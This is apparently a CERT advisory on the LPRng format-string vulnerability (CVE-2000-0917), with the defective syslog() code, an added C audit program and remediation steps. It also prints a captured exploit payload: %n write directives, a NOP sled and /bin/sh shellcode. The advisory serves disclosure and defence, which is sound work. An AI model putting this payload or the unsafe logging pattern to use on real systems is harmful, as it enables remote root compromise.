Vulnerability Note VU#382365

LPRng can pass user-supplied input as a format string parameter to syslog() calls

Original Release date: 04 Dec 2000 | Last revised: 27 Jan 2003

Overview

LPRng, a popular replacement for the BSD lpd printing service, contains at least one software defect of the kind known as a "format string vulnerability", which may allow remote users to execute arbitrary code on vulnerable systems. Such code would most likely run with root privileges.

Description

LPRng, the "next generation" print-service management software now packaged with several open-source operating system distributions, passes a message as the format argument in at least two calls to the syslog() function instead of supplying a constant format string. Because that message is built from data supplied by the client, a remote user who can reach the printer port (515/tcp) can embed printf-style directives in a request. syslog() formats its output with the same engine as the *printf() family, so a directive such as %n stores a value through a pointer taken from the daemon's stack, allowing the attacker to overwrite arbitrary addresses in the printing service's address space. Such writes can cause segmentation violations, denying printing service, or redirect execution to arbitrary code injected into the daemon's memory by other means, for example carried in the request itself as in the sample entry below.

The vulnerable calls in this case occur in the following section of code:

LPRng-3.6.24/src/common/errormsg.c, use_syslog()
---
static void use_syslog(int kind, char *msg)
[...]
# ifdef HAVE_OPENLOG
        /* use the openlog facility */
        openlog(Name, LOG_PID | LOG_NOWAIT, SYSLOG_FACILITY );
        syslog(kind, msg);             /* msg (client-derived) is used as the format string */
        closelog();

# else
    (void) syslog(SYSLOG_FACILITY | kind, msg);    /* same defect on the non-openlog path */
# endif                                                 /* HAVE_OPENLOG */
[...]


Sample syslog entry recorded during exploitation of this vulnerability (non-printable bytes are shown as {hex}; the leading bytes are four consecutive little-endian stack addresses, followed by the format directives, a NOP sled and shellcode):

Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
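The following program is an added example written for this note; it is not LPRng code and not part of the original vulnerability note. It does two things. First, it models the two syslog() call patterns, the vulnerable one (message used as the format) and the fixed one (constant "%s" format), with vsnprintf(), which is the formatting engine behind syslog(), writing into a buffer so the result can be inspected instead of going to the system log. Second, it scans a string with the same grammar printf uses and reports the conversions that string would trigger, which is how one triages a logged request line like the sample above. The payload it analyses is constructed here to match the directive portion of that sample (the binary addresses and shellcode are left out, and the stray space in the excerpt is read as %301$n); the names audit_format, log_unsafe, log_safe, sink and fmt_report are the example's own. Read against the sample, each %.Nu pads the output so that the running character count reaches the byte value the attacker wants, and each following %k$n stores that count through the k-th variadic argument, which is fetched from the stack where the request's four leading addresses sit one byte apart; four such writes set four consecutive bytes at an attacker-chosen location.

```c
/* fmt_audit.c: what happens when attacker-controlled text is used as a
 * printf-family format string.  Added example; not LPRng code.
 *
 * Build: cc -Wall -o fmt_audit fmt_audit.c && ./fmt_audit
 */
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed payload modelled on the directive portion of the sample
 * syslog entry (binary address bytes and shellcode omitted). */
static const char SAMPLE_PAYLOAD[] =
    "XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301$nsecurity%302$n%.192u%303$n";

/* What the C library's format parser would do with a string. */
struct fmt_report {
    int  directives;    /* conversions other than "%%" */
    int  n_writes;      /* "%n" conversions: each stores the byte count so far through a pointer argument */
    int  positional;    /* conversions of the "%k$..." form, which select argument k directly */
    int  max_position;  /* largest k seen */
    long max_precision; /* largest precision seen, e.g. 168 in "%.168u" */
};

/* Walk s with printf's grammar (%[k$][flags][width][.prec][len]conv) and
 * record the conversions it would perform.  Returns their number; 0 means
 * the string is harmless as a format. */
static int audit_format(const char *s, struct fmt_report *r)
{
    const char *p = s;

    memset(r, 0, sizeof *r);
    while (*p) {
        if (*p++ != '%')
            continue;
        if (*p == '%') {                        /* "%%" prints a literal '%' */
            p++;
            continue;
        }
        const char *q = p;                      /* optional "k$" argument selector */
        long num = 0;
        while (isdigit((unsigned char)*q))
            num = num * 10 + (*q++ - '0');
        if (*q == '$') {
            r->positional++;
            if (num > r->max_position)
                r->max_position = (int)num;
            p = q + 1;
        }
        while (*p && strchr("-+ #0", *p))       /* flags */
            p++;
        while (isdigit((unsigned char)*p))      /* width */
            p++;
        if (*p == '.') {                        /* precision: minimum digits for %u */
            long prec = 0;
            p++;
            while (isdigit((unsigned char)*p))
                prec = prec * 10 + (*p++ - '0');
            if (prec > r->max_precision)
                r->max_precision = prec;
        }
        while (*p && strchr("hlLqjzt", *p))     /* length modifier */
            p++;
        if (*p == '\0')
            break;                              /* truncated directive, nothing to convert */
        r->directives++;
        if (*p == 'n')
            r->n_writes++;
        p++;
    }
    return r->directives;
}

/* The formatting engine behind syslog(), writing to the caller's buffer. */
static int sink(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int len;

    va_start(ap, fmt);
    len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern, as in syslog(kind, msg): every '%' in msg is interpreted. */
static int log_unsafe(char *out, size_t n, const char *msg)
{
    return sink(out, n, msg);
}

/* Fixed pattern: constant format, msg is passed only as data. */
static int log_safe(char *out, size_t n, const char *msg)
{
    return sink(out, n, "%s", msg);
}

int main(void)
{
    struct fmt_report r;
    char buf[128];
    const char *request = "bad request line '100%% done'";   /* constructed benign input */

    audit_format(SAMPLE_PAYLOAD, &r);
    printf("payload: %d conversions, %d positional (highest %%%d$), %d %%n writes, "
           "largest precision %ld\n",
           r.directives, r.positional, r.max_position, r.n_writes, r.max_precision);

    /* Only benign input goes through the unsafe sink: SAMPLE_PAYLOAD would
     * dereference argument slots 300..303 as pointers. */
    log_unsafe(buf, sizeof buf, request);
    printf("unsafe sink: %s\n", buf);
    log_safe(buf, sizeof buf, request);
    printf("safe   sink: %s\n", buf);
    return 0;
}
```

audit_format() reports six conversions for the constructed payload, four of them %n writes selecting arguments 300 through 303, and a largest precision of 192; the benign request loses its doubled percent sign through log_unsafe() and survives unchanged through log_safe(). The payload is deliberately never handed to log_unsafe(): doing so is undefined behaviour, and glibc built with _FORTIFY_SOURCE aborts on a %n found in a writable format string rather than performing the write. The scanner is for triage of logged or captured input; the fix for the code itself is the constant format shown in log_safe().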

Impact

A remote user may be able to execute arbitrary code or cause a denial of service. The privileges the malicious code would have depend on whether the print daemon drops its root privileges before or after the vulnerable syslog() calls.

Solution

Upgrade to a non-vulnerable version of LPRng (3.6.25 or later), as described in the vendor information below.

Restrict access to the printer service port (typically 515/tcp) using a firewall or packet filtering.

Systems Affected

Vendor                        Status        Date Notified  Date Updated
Debian                        Affected      06 Dec 2000    07 Dec 2000
FreeBSD                       Affected      06 Dec 2000    11 Dec 2000
NetBSD                        Affected      06 Dec 2000    11 Dec 2000
Patrick Powell                Affected      -              05 Dec 2000
Red Hat Inc.                  Affected      26 Sep 2000    27 Jan 2003
The SCO Group (SCO Linux)     Affected      -              05 Dec 2000
Trustix                       Affected      -              04 Dec 2000
Apple Computer Inc.           Not Affected  06 Dec 2000    11 Dec 2000
Compaq Computer Corporation   Not Affected  06 Dec 2000    11 Dec 2000
Hewlett-Packard Company       Not Affected  06 Dec 2000    11 Dec 2000
IBM                           Not Affected  06 Dec 2000    11 Dec 2000
Microsoft Corporation         Not Affected  06 Dec 2000    11 Dec 2000
OpenBSD                       Not Affected  06 Dec 2000    07 Dec 2000
SGI                           Not Affected  06 Dec 2000    12 Dec 2000
SuSE Inc.                     Not Affected  -              05 Dec 2000

CVSS Metrics

Group          Score  Vector
Base           N/A    N/A
Temporal       N/A    N/A
Environmental  N/A    N/A

Credit

Thanks to Chris Evans for making this code sample public.

This document was written by Jeffrey S Havrilla.

Other Information

  • CVE IDs: CVE-2000-0917
  • CERT Advisory: CA-2000-22
  • Date Public: 25 Sep 2000
  • Date First Published: 04 Dec 2000
  • Date Last Updated: 27 Jan 2003
  • Severity Metric: 48.20
  • Document Revision: 41
